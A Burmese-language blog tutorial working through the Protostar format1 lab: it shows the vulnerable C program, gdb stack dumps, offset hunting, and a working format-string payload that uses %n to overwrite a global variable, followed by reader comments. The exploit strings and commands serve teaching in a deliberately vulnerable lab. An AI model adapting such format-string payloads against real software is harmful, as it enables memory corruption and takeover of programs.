0x0D – Modify variable using format string

Format String ရဲ႕ memory leak တဲ့ အေၾကာင္းကို ျပီးခဲ့တဲ့ Introduction to format string မွာေလ့လာခဲ့ျပီးျဖစ္ပါတယ္။ ဒီေတာ့ format string ကိုသံုးျပီး ဘယ္လိုေတြလုပ္မလဲ ။ Bof တုန္းကလိုပဲေလ့လာၾကမယ္။

C code from protostar

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int target;

void vuln(char *string)
{
  printf(string);
  
  if(target) {
      printf("you have modified the target :)\n");
  }
}

int main(int argc, char **argv)
{
  vuln(argv[1]);
}

ဒီမွာ အားနည္းခ်က္ကေတာ့ format string ဆိုတာ ၾကည့္လိုက္ယံုနဲ႕သိပါတယ္။ ဒါေပမဲ့ ဒီမွာလုပ္ရမွာက Global variable ျဖစ္တဲ့ target ကို modify လုပ္ရမွာျဖစ္ပါတယ္။

format string vuln ျဖစ္မျဖစ္ အရင္ဆံုးစမ္းမယ္။

$ ./format1 "AAAA%x"
AAAA804960c

memory address တစ္ခုထြက္လာတယ္။ ဒါဆိုရင္ရွိတယ္ေပါ့ ။ debug လုပ္ၾကည့္မယ္။

(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x0804841c <main+0>:    push   ebp
0x0804841d <main+1>:    mov    ebp,esp
0x0804841f <main+3>:    and    esp,0xfffffff0
0x08048422 <main+6>:    sub    esp,0x10
0x08048425 <main+9>:    mov    eax,DWORD PTR [ebp+0xc]
0x08048428 <main+12>:   add    eax,0x4
0x0804842b <main+15>:   mov    eax,DWORD PTR [eax]
0x0804842d <main+17>:   mov    DWORD PTR [esp],eax
0x08048430 <main+20>:   call   0x80483f4 <vuln>
0x08048435 <main+25>:   leave
0x08048436 <main+26>:   ret
End of assembler dump.

main function က vuln ကို လွမ္းေခၚတာပဲရွိမယ္။ vuln function မွာ break point 2 ခုထံုးစံအတိုင္းထားလိုက္မယ္

(gdb) disas vuln
Dump of assembler code for function vuln:
0x080483f4 <vuln+0>:    push   ebp
0x080483f5 <vuln+1>:    mov    ebp,esp
0x080483f7 <vuln+3>:    sub    esp,0x18
0x080483fa <vuln+6>:    mov    eax,DWORD PTR [ebp+0x8]
0x080483fd <vuln+9>:    mov    DWORD PTR [esp],eax
0x08048400 <vuln+12>:   call   0x8048320 <printf@plt>
0x08048405 <vuln+17>:   mov    eax,ds:0x8049638
0x0804840a <vuln+22>:   test   eax,eax
0x0804840c <vuln+24>:   je     0x804841a <vuln+38>
0x0804840e <vuln+26>:   mov    DWORD PTR [esp],0x8048500
0x08048415 <vuln+33>:   call   0x8048330 <puts@plt>
0x0804841a <vuln+38>:   leave
0x0804841b <vuln+39>:   ret
End of assembler dump.
(gdb) break *vuln+12
Breakpoint 1 at 0x8048400: file format1/format1.c, line 10.
(gdb) break *vuln+39
Breakpoint 2 at 0x804841b: file format1/format1.c, line 15.

Ok run ၾကည့္မယ္။

(gdb) r "AAAA%x"
Starting program: /opt/protostar/bin/format1 "AAAA%x"
0xbffffc80:     0xbffffe8e      0x0804960c      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0xbffffcb8      0x08048435
0xbffffca0:     0xbffffe8e      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848
0xbffffcd0:     0xbffffd20      0xffffffff      0xb7ffeff4      0x0804824d
0xbffffce0:     0x00000001      0xbffffd20      0xb7ff0626      0xb7fffab0
0xbffffcf0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0x8048400 <vuln+12>:    call   0x8048320 <printf@plt>
0x8048405 <vuln+17>:    mov    eax,ds:0x8049638

Breakpoint 1, 0x08048400 in vuln (string=0xbffffe8e "AAAA%x")
    at format1/format1.c:10
10      format1/format1.c: No such file or directory.
        in format1/format1.c

ျပီးခဲ့တဲ့ post အတိုင္းပဲ leak လာတာဟာ stack ရဲ႕ second argument ေတြျဖစ္တယ္။ ဒီမွာ တစ္ခုသတိထားမိရမွာက AAAA ေတြကို stack ထဲမွာ အလြယ္တကူမေတြ႕ပါဘူး

100 ထိထုတ္ၾကည့္လိုက္မယ္။

$ ./format1 "`python -c 'print "AAAA"+"%08x."*100'`"
AAAA0804960c.bffffb08.08048469.b7fd8304.b7fd7ff4.bffffb08.08048435.bffffcc1.b7ff                                                                                        1040.0804845b.b7fd7ff4.08048450.00000000.bffffb88.b7eadc76.00000002.bffffbb4.bff                                                                                        ffbc0.b7fe1848.bffffb70.ffffffff.b7ffeff4.0804824d.00000001.bffffb70.b7ff0626.b7                                                                                        fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb88.b4ff8aa3.9eb1dcb3.00000000.0                                                                                        0000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.                                                                                        08048340.00000000.08048361.0804841c.00000002.bffffbb4.08048450.08048440.b7ff1040                                                                                        .bffffbac.b7fff8f8.00000002.bffffcb7.bffffcc1.00000000.bffffeba.bffffedd.bffffee                                                                                        7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffff                                                                                        a5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000                                                                                        006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.0000                                                                                        0007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.000                                                                                        0000c.00000000.0000000d.

ဒါလဲမေတြ႕ဘူး။ 200 ထုတ္ၾကည့္မယ္ ဒါဆို

$ ./format1 "`python -c 'print "AAAA"+"%08x."*200'`"
AAAA0804960c.bffff918.08048469.b7fd8304.b7fd7ff4.bffff918.08048435.bffffacd.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffff998.b7eadc76.00000002.bffff9c4.bffff9d0.b7fe1848.bffff980.ffffffff.b7ffeff4.0804824d.00000001.bffff980.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffff998.a80d15fd.824723ed.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffff9c4.08048450.08048440.b7ff1040.bffff9bc.b7fff8f8.00000002.bffffac3.bffffacd.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffaab.0000001f.bffffff2.0000000f.bffffabb.00000000.00000000.02000000.aab55996.5d412bff.ca4b3599.69c0f316.00363836.2e000000.726f662f.3174616d.41414100.38302541.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.

ေတြ႕ျပီ။ ဒီေတာ့ က်ေနာ္တို႕ write ရမယ္။ format string မွာ %x ေတြက memory leak ပဲလုပ္နိုင္တယ္ဆိုေပမဲ့ %n ကေတာ့ အဲဒီ address ကို write လုပ္လို႕ရပါတယ္။ ေလာေလာဆယ္ေတာ့ target variable ကို အရင္ဆံုးရွာရမယ္။ သူရွိတဲ့ address ကိုသိမွ က်ေနာ္တို႕ modify လုပ္လို႕ရမွာျဖစ္ပါတယ္

$ objdump -t format1

format1:     file format elf32-i386

SYMBOL TABLE:
08048114 l    d  .interp        00000000              .interp
08048128 l    d  .note.ABI-tag  00000000              .note.ABI-tag
08048148 l    d  .note.gnu.build-id     00000000              .note.gnu.build-id
0804816c l    d  .hash  00000000              .hash
08048198 l    d  .gnu.hash      00000000              .gnu.hash
080481b8 l    d  .dynsym        00000000              .dynsym
08048218 l    d  .dynstr        00000000              .dynstr
0804826a l    d  .gnu.version   00000000              .gnu.version
08048278 l    d  .gnu.version_r 00000000              .gnu.version_r
08048298 l    d  .rel.dyn       00000000              .rel.dyn
080482a0 l    d  .rel.plt       00000000              .rel.plt
080482c0 l    d  .init  00000000              .init
080482f0 l    d  .plt   00000000              .plt
08048340 l    d  .text  00000000              .text
080484dc l    d  .fini  00000000              .fini
080484f8 l    d  .rodata        00000000              .rodata
08048520 l    d  .eh_frame      00000000              .eh_frame
08049524 l    d  .ctors 00000000              .ctors
0804952c l    d  .dtors 00000000              .dtors
08049534 l    d  .jcr   00000000              .jcr
08049538 l    d  .dynamic       00000000              .dynamic
08049608 l    d  .got   00000000              .got
0804960c l    d  .got.plt       00000000              .got.plt
08049628 l    d  .data  00000000              .data
08049630 l    d  .bss   00000000              .bss
00000000 l    d  .stab  00000000              .stab
00000000 l    d  .stabstr       00000000              .stabstr
00000000 l    d  .comment       00000000              .comment
00000000 l    df *ABS*  00000000              crtstuff.c
08049524 l     O .ctors 00000000              __CTOR_LIST__
0804952c l     O .dtors 00000000              __DTOR_LIST__
08049534 l     O .jcr   00000000              __JCR_LIST__
08048370 l     F .text  00000000              __do_global_dtors_aux
08049630 l     O .bss   00000001              completed.5982
08049634 l     O .bss   00000004              dtor_idx.5984
080483d0 l     F .text  00000000              frame_dummy
00000000 l    df *ABS*  00000000              crtstuff.c
08049528 l     O .ctors 00000000              __CTOR_END__
08048520 l     O .eh_frame      00000000              __FRAME_END__
08049534 l     O .jcr   00000000              __JCR_END__
080484b0 l     F .text  00000000              __do_global_ctors_aux
00000000 l    df *ABS*  00000000              format1.c
0804960c l     O .got.plt       00000000              .hidden _GLOBAL_OFFSET_TABLE_
08049524 l       .ctors 00000000              .hidden __init_array_end
08049524 l       .ctors 00000000              .hidden __init_array_start
08049538 l     O .dynamic       00000000              .hidden _DYNAMIC
08049628  w      .data  00000000              data_start
08048440 g     F .text  00000005              __libc_csu_fini
08048340 g     F .text  00000000              _start
00000000  w      *UND*  00000000              __gmon_start__
00000000  w      *UND*  00000000              _Jv_RegisterClasses
080484f8 g     O .rodata        00000004              _fp_hw
080484dc g     F .fini  00000000              _fini
00000000       F *UND*  00000000              __libc_start_main@@GLIBC_2.0
080484fc g     O .rodata        00000004              _IO_stdin_used
08049628 g       .data  00000000              __data_start
0804962c g     O .data  00000000              .hidden __dso_handle
08049530 g     O .dtors 00000000              .hidden __DTOR_END__
08048450 g     F .text  0000005a              __libc_csu_init
00000000       F *UND*  00000000              printf@@GLIBC_2.0
08049630 g       *ABS*  00000000              __bss_start
080483f4 g     F .text  00000028              vuln
08049638 g     O .bss   00000004              target
0804963c g       *ABS*  00000000              _end
00000000       F *UND*  00000000              puts@@GLIBC_2.0
08049630 g       *ABS*  00000000              _edata
080484aa g     F .text  00000000              .hidden __i686.get_pc_thunk.bx
0804841c g     F .text  0000001b              main
080482c0 g     F .init  00000000              _init

.bss section ထဲမွာ global variable ျဖစ္တဲ့ target ကိုသိမ္းထားတာေတြ႕ရမွာျဖစ္တယ္။

08049638 g O .bss 00000004 target

08049638 က target ရဲ႕ address ပဲျဖစ္တယ္။ ဒီေတာ့ ဘယ္လိုဆက္လုပ္ရမလဲ ?

က်ေနာ္တို႕ wirte လုပ္တဲ့အခါမွာ address က memory address ေပၚကို အတိအက်ေရာကေ္နဖို႕လိုပါတယ္။ ဘာကိုဆိုလိုတာလဲဆိုတာေတာ့ ဆက္လုပ္ျပီးၾကည့္လိုက္မယ္။

08049638 = \x38\x96\x04\x08

$ ./format1 "`python -c 'print "AAAAAAAA"+"\x38\x96\x04\x08"+"BBBB"+"%08x"*200'`                                                                                        "
AAAAAAAA8BBBB0804960cbffff9c808048469b7fd8304b7fd7ff4bffff9c808048435bffffb89b7f                                                                                        f10400804845bb7fd7ff40804845000000000bffffa48b7eadc7600000002bffffa74bffffa80b7f                                                                                        e1848bffffa30ffffffffb7ffeff40804824d00000001bffffa30b7ff0626b7fffab0b7fe1b28b7f                                                                                        d7ff40000000000000000bffffa48b819b36c9252657c00000000000000000000000000000002080                                                                                        4834000000000b7ff6210b7eadb9bb7ffeff4000000020804834000000000080483610804841c000                                                                                        00002bffffa740804845008048440b7ff1040bffffa6cb7fff8f800000002bffffb7fbffffb89000                                                                                        00000bffffebabffffeddbffffee7bffffefbbfffff0dbfffff1dbfffff30bfffff3dbfffff48bff                                                                                        fff86bfffff97bfffffa5bfffffbc0000000000000020b7fe241400000021b7fe200000000010078                                                                                        bfbbf000000060000100000000011000000640000000308048034000000040000002000000005000                                                                                        0000700000007b7fe3000000000080000000000000009080483400000000b000003e90000000c000                                                                                        000000000000d000003e90000000e000003e9000000170000000100000019bffffb5b0000001fbff                                                                                        ffff20000000fbffffb6b00000000000000006b0000000972c177d809a3f56130a9a769bd26f2003                                                                                        638360000000000000000000000002e000000726f662f3174616d414141004141414104963841424                                                                                        24208383025423830257838302578383025783830257838302578383025783830257838302578383                                                                                        02578383025783830257838302578383025783830257838302578383025783830257838302578383                                                                                        02578383025783830257838302578383025783830257838302578383025783830257838302578383                                                                                        02578383025783830257838302578383025783830257838302578383025783830257838302578383                                                                                        02578383025783830257838302578383025783830257838302578383025783830257838302578383                                                                                        02578383025783830257838302578383025783830257838302578383025783830257838302578383                                                                                        02578383025783830257838302578383025783830257838302578383025783830257838302578383                                                                                        0257838302578

ေနာက္မွာလဲ ေတာ္ေတာ္ပိုေနတယ္ အတိအက်လဲမရဘူးျဖစ္ေနတယ္။ gdb ကိုျပန္ၾကည့္ရေအာင္

(gdb) ni
0xbffffc80:     0xbffffe8e      0x0804960c      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0xbffffcb8      0x08048435
0xbffffca0:     0xbffffe8e      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848
0xbffffcd0:     0xbffffd20      0xffffffff      0xb7ffeff4      0x0804824d
0xbffffce0:     0x00000001      0xbffffd20      0xb7ff0626      0xb7fffab0
0xbffffcf0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0x8048400 <vuln+12>:    call   0x8048320 <printf@plt>
0x8048405 <vuln+17>:    mov    eax,ds:0x8049638
0x08048400      10      in format1/format1.c

printf ကိုမေခၚခင္ပံုစံျဖစ္တယ္။ 0x0804960c ဒါက ပထမဆံုး leak လာမယ္ံ memory address ျဖစ္တယ္ဆိုရင္

0xbffffe8e ထဲမွာဘာရွိလဲ ? format string မဟုတ္လား အရင္ post ကိုျပန္ၾကည့္လို႕ရပါတယ္။

(gdb) x/x 0xbffffe8e
0xbffffe8e:     0x41414141

ေတာ္ေတာ္ေအာက္ေရာက္သြားတာမလို႕ က်ေနာ္တို႕ stack ကို 200 ထိထုတ္ၾကည့္လိုက္မယ္

(gdb) x/200wx $esp
0xbffffc80:     0xbffffe8e      0x0804960c      0xbffffcb8      0x08048469
0xbffffc90:     0xb7fd8304      0xb7fd7ff4      0xbffffcb8      0x08048435
0xbffffca0:     0xbffffe8e      0xb7ff1040      0x0804845b      0xb7fd7ff4
0xbffffcb0:     0x08048450      0x00000000      0xbffffd38      0xb7eadc76
0xbffffcc0:     0x00000002      0xbffffd64      0xbffffd70      0xb7fe1848
0xbffffcd0:     0xbffffd20      0xffffffff      0xb7ffeff4      0x0804824d
0xbffffce0:     0x00000001      0xbffffd20      0xb7ff0626      0xb7fffab0
0xbffffcf0:     0xb7fe1b28      0xb7fd7ff4      0x00000000      0x00000000
0xbffffd00:     0xbffffd38      0x6cd66236      0x46979426      0x00000000
0xbffffd10:     0x00000000      0x00000000      0x00000002      0x08048340
0xbffffd20:     0x00000000      0xb7ff6210      0xb7eadb9b      0xb7ffeff4
0xbffffd30:     0x00000002      0x08048340      0x00000000      0x08048361
0xbffffd40:     0x0804841c      0x00000002      0xbffffd64      0x08048450
0xbffffd50:     0x08048440      0xb7ff1040      0xbffffd5c      0xb7fff8f8
0xbffffd60:     0x00000002      0xbffffe73      0xbffffe8e      0x00000000
0xbffffd70:     0xbffffe95      0xbffffe9f      0xbffffec2      0xbffffed6
0xbffffd80:     0xbffffee6      0xbffffef8      0xbfffff0b      0xbfffff18
0xbffffd90:     0xbfffff23      0xbfffff2e      0xbfffff6c      0xbfffff7d
0xbffffda0:     0xbfffff8b      0xbfffffa2      0xbfffffd8      0x00000000
0xbffffdb0:     0x00000020      0xb7fe2414      0x00000021      0xb7fe2000
0xbffffdc0:     0x00000010      0x078bfbbf      0x00000006      0x00001000
0xbffffdd0:     0x00000011      0x00000064      0x00000003      0x08048034
0xbffffde0:     0x00000004      0x00000020      0x00000005      0x00000007
---Type <return> to continue, or q <return> to quit---
0xbffffdf0:     0x00000007      0xb7fe3000      0x00000008      0x00000000
0xbffffe00:     0x00000009      0x08048340      0x0000000b      0x000003e9
0xbffffe10:     0x0000000c      0x000003e9      0x0000000d      0x000003e9
0xbffffe20:     0x0000000e      0x000003e9      0x00000017      0x00000001
0xbffffe30:     0x00000019      0xbffffe5b      0x0000001f      0xbfffffe1
0xbffffe40:     0x0000000f      0xbffffe6b      0x00000000      0x00000000
0xbffffe50:     0x00000000      0x00000000      0x78000000      0xf19aee37
0xbffffe60:     0xe4a4c997      0x4e611f21      0x696fd209      0x00363836
0xbffffe70:     0x2f000000      0x2f74706f      0x746f7270      0x6174736f
0xbffffe80:     0x69622f72      0x6f662f6e      0x74616d72      0x41410031
0xbffffe90:     0x78254141      0x45535500      0x73753d52      0x53007265
0xbffffea0:     0x435f4853      0x4e45494c      0x39313d54      0x36312e32
0xbffffeb0:     0x33342e38      0x3433322e      0x39333520      0x32203636
0xbffffec0:     0x414d0032      0x2f3d4c49      0x2f726176      0x6c69616d
0xbffffed0:     0x6573752f      0x4f480072      0x2f3d454d      0x656d6f68
0xbffffee0:     0x6573752f      0x4c4f0072      0x44575044      0x6f682f3d
0xbffffef0:     0x752f656d      0x00726573      0x5f485353      0x3d595454
0xbfffff00:     0x7665642f      0x7374702f      0x4c00312f      0x414e474f
0xbfffff10:     0x753d454d      0x00726573      0x554c4f43      0x3d534e4d
0xbfffff20:     0x54003038      0x3d4d5245      0x72657478      0x4150006d
0xbfffff30:     0x2f3d4854      0x2f727375      0x61636f6c      0x69622f6c
0xbfffff40:     0x752f3a6e      0x622f7273      0x2f3a6e69      0x3a6e6962
0xbfffff50:     0x7273752f      0x636f6c2f      0x672f6c61      0x73656d61
---Type <return> to continue, or q <return> to quit---
0xbfffff60:     0x73752f3a      0x61672f72      0x0073656d      0x474e414c
0xbfffff70:     0x5f6e653d      0x552e5355      0x382d4654      0x45485300
0xbfffff80:     0x2f3d4c4c      0x2f6e6962      0x50006873      0x2f3d4457
0xbfffff90:     0x2f74706f      0x746f7270      0x6174736f      0x69622f72

ဒီဟာကို alignment ကိုဘယ္လိုတြက္မလဲ ?

stack ရဲ႕ အစကေန format string ရွိတဲ့ေနရာက အတိအက်ပဲမဟုတ္လား ?

(gdb) x/d 0xbffffe8e-0xbffffc80
0x20e:  Cannot access memory at address 0x20e

0x20e က ဘယ္ေလာက္လဲ

>>> 0x20e
526

ဒီေတာ့ calculator နဲ႕ 526 ကို 4 နဲ႕ စားလိုက္မယ္ ။ 131 ရတယ္ ။ စမ္းၾကည့္မယ္

$ ./format1 "`python -c 'print "AAAA"+"\x38\x96\x04\x08"+"BBBB"+"%08x"*131'`"
AAAA8BBBB0804960cbffffae808048469b7fd8304b7fd7ff4bffffae808048435bffffca1b7ff10400804845bb7fd7ff40804845000000000bffffb68b7eadc7600000002bffffb94bffffba0b7fe1848bffffb50ffffffffb7ffeff40804824d00000001bffffb50b7ff0626b7fffab0b7fe1b28b7fd7ff40000000000000000bffffb68cc9dca9ee6d05c8e000000000000000000000000000000020804834000000000b7ff6210b7eadb9bb7ffeff4000000020804834000000000080483610804841c00000002bffffb940804845008048440b7ff1040bffffb8cb7fff8f800000002bffffc97bffffca100000000bffffebabffffeddbffffee7bffffefbbfffff0dbfffff1dbfffff30bfffff3dbfffff48bfffff86bfffff97bfffffa5bfffffbc0000000000000020b7fe241400000021b7fe200000000010078bfbbf0000000600001000000000110000006400000003080480340000000400000020000000050000000700000007b7fe3000000000080000000000000009080483400000000b000003e90000000c000000000000000d000003e90000000e000003e9000000170000000100000019bffffc7b0000001fbffffff20000000fbffffc8b00000000000000002c00000015256b6335f099b487212d496997423300363836000000002e000000726f662f3174616d4141410004963841424242083830254238302578383025783830257838302578

မဟုတ္ဘူး :3 တလြဲေတြျဖစ္ကုန္တယ္ ။ ေတာ္ေတာ္စမ္းလိုက္ရတယ္ အဲ့ဒီ alignment က ။

မဟုတ္တာေတြဘာလို႕ထည့္ေရးထားလဲလို႕ေမးရင္ေတာ့ က်ေနာ္တစ္ခါတည္းစမ္းရင္းေရးတာမလို႕ပါ ။ ခုစမ္းတဲ့နည္းက Live Overflow ရဲ႕ Video ထဲမွာရပါတယ္။ က်ေနာ္႕ဆီမွာေတာ့မရဘူး ။ အဲဒါေၾကာင့္ alignment ကို စိတ္ေအးေအးထားျပီး ျပန္လုပ္လိုက္တယ္။ ၾကားထဲက မရတဲ့ဟာေတြကိုေတာ့ ဒီမွာမျပေတာ့ပါဘူး ။ ေတာ္ေတာ္မ်ားပါတယ္ ။ အၾကိမ္ၾကိမ္စမ္ထားတာမလို႕ပါ 😀

ေနာက္ဆံုးေတာ့ က်ေနာ္ ဒီလိုျပန္ရွာလိုက္ပါတယ္။

$ ./format1 "`python -c 'print "AAAA"+"%08x."*123+"%08x.%08x.%08x"'`"
AAAA0804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc40.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.463cacbf.6c71faaf.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc36.bffffc40.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.81000000.c6f8ff03.cce05ce4.f1a870a7.69f69568.00363836.00000000.2f2e0000.6d726f66.00317461.41414141.78383025.3830252e

123 ေနာက္က %08x ဟာ A ေတြနဲ႕ကြက္တိက်ေနတာကိုေတြ႕ရမွာပါ

ဒါေၾကာင့္ write ၾကည့္လိုက္မယ္။

$ ./format1 "`python -c 'print "AAAA"+"%08x."*123+"%n.%08x.%08x"'`"
AAAA0804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc42.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.06caacf2.2c87fae2.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc38.bffffc42.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.b60Segmentation fault

Segmentation fault error ရတယ္ ဒါဆိုရင္ေတာ့ အလုပ္ျဖစ္တယ္လို႕ ယူဆရတယ္။ ဒါေၾကာင့္ AAAA ေတြရဲ႕ေနရာမွာ global variable target ရဲ႕ address ကိုျပန္ထည့္မယ္။

$ ./format1 "`python -c 'print "\x38\x96\x04\x08"+"%08x."*123+"%08x.%08x.%08x"'`"
80804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc40.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.ef8a700d.c5c7261d.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc36.bffffc40.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.26000000.a8dc3df6.a5b9083f.9eb849d7.69759cdd.00363836.00000000.2f2e0000.6d726f66.00317461.08049638.78383025.3830252e$

ကြက္တိေတြေတာ့ျဖစ္ကုန္ပါျပီ 😀

ဒါဆို အဲ့ေနရာမွာပဲ write လိုက္ေတာ့မယ္။

./format1 "`python -c 'print "\x38\x96\x04\x08"+"%08x."*123+"%08n.%08x.%08x"'`"

Nice !

$ ./format1 "`python -c 'print "\x38\x96\x04\x08"+"%08x."*123+"%08n.%08x.%08x"'`"
80804960c.bffffa88.08048469.b7fd8304.b7fd7ff4.bffffa88.08048435.bffffc40.b7ff1040.0804845b.b7fd7ff4.08048450.00000000.bffffb08.b7eadc76.00000002.bffffb34.bffffb40.b7fe1848.bffffaf0.ffffffff.b7ffeff4.0804824d.00000001.bffffaf0.b7ff0626.b7fffab0.b7fe1b28.b7fd7ff4.00000000.00000000.bffffb08.4cb15c2d.66fc0a3d.00000000.00000000.00000000.00000002.08048340.00000000.b7ff6210.b7eadb9b.b7ffeff4.00000002.08048340.00000000.08048361.0804841c.00000002.bffffb34.08048450.08048440.b7ff1040.bffffb2c.b7fff8f8.00000002.bffffc36.bffffc40.00000000.bffffeba.bffffedd.bffffee7.bffffefb.bfffff0d.bfffff1d.bfffff30.bfffff3d.bfffff48.bfffff86.bfffff97.bfffffa5.bfffffbc.00000000.00000020.b7fe2414.00000021.b7fe2000.00000010.078bfbbf.00000006.00001000.00000011.00000064.00000003.08048034.00000004.00000020.00000005.00000007.00000007.b7fe3000.00000008.00000000.00000009.08048340.0000000b.000003e9.0000000c.00000000.0000000d.000003e9.0000000e.000003e9.00000017.00000001.00000019.bffffc1b.0000001f.bffffff2.0000000f.bffffc2b.00000000.00000000.d9000000.3e938fc2.3ba959a2.16220121.6975bd50.00363836.00000000.2f2e0000.6d726f66.00317461..78383025.3830252eyou have modified the target 🙂

POC

Thanks

 

 

 

3 Comments

  1. က်ြန္ေတာ္ ကေတာ့ ဒီလိုမ်ိုးလုပ္လိုက္တာ 😀
    https://s9.postimg.org/vltrt5kan/Screenshot_from_2018-04-08_21-53-21.png

    အေနာက္က CCC သံုးလံုး ကိုေတာ့ padding အေနနဲ့ ထည့္လိုက္တာ ျပီးေတာ့ AAAA ရဲ့ offset ကို အတိအက်ယူျပီး write လုပ္လိုက္တာ္ 😀
    Thanks For Sharing Bro

    • Great bro 😉 တစ္ခုေလာက္ေမးမယ္ေနာ္ 😀 အရင္က Linux binary exploitation
      ကိုေလ့လာဖူးလား မသိဘူး

      • နည္းနည္းေတာ့ေလ့လာဖူးတယ္ ဟိုေယာင္ေယာင္ ဒီေယာင္ေယာာင္ ပါ။ ဟီး

1 Trackback / Pingback

  1. 0x0E – Global Offset Table Overwrite using Format String – Legion of LOL

Comments are closed.